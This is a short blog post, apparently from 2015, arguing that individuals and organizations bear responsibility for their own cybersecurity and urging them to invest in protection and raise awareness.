by Malik korrich ~ lundi 21 décembre 2015 0 commentaires

The Theory of Every Hacking Attack

“Nobody can hack you without your permission”

Sometimes it is very hard to transfer your feelings and thoughts into words, especially if you are trying to say something about someone’s privacy and security. It is not an easy job to handle a situation when your friend, client or loved one got hacked, but you have to manage it; you have to take some steps to reduce the loss as much as you can. Why we always think about the techniques to be implemented after getting hacked, why not do something that prevents hacking attacks? Why not find the problem that ended as hacking attack?

The answer of all of these questions is hidden within yourself, you at the very first sight are responsible to manage and secure your assets (privacy, passwords and etc). Nobody can hack you without your permission does not mean that hacker needs your written approval prior hacking attack. But in true sense it means that, you intentionally or unintentionally give opportunity to a hacker to exploit your security. So you are the one who is responsible and answerable for your own security and privacy, Government, your ISP and even your vendor have limited resources while managing your security. But you got all the resources.

Let's consider an example, I witness that many organizations are reluctant to upgrade their systems and processes that prevents the hacking attack; most of the time they care about saving or they simply don't care the security of their data. And the result is breached, data stolen; now tell me who is responsible? Is it the network administrator who gave several proposal to upgrade the system but you did not release the fund. So who is responsible?

The theory of every hacking attack is: “Nobody can hack you without your permission” or “Your security is directly proportional to your willingness to stay secure”

It’s time to take some serious steps to strengthen your security and you should care about it because it’s all about your data. Being related with Infosec industry, you should also spread the information, knowledge and awareness so that a common user can take some steps to stay secure.

It's our job to spread the theory of every hacking attack.

Read more

by Malik korrich ~ mercredi 4 mars 2015 0 commentaires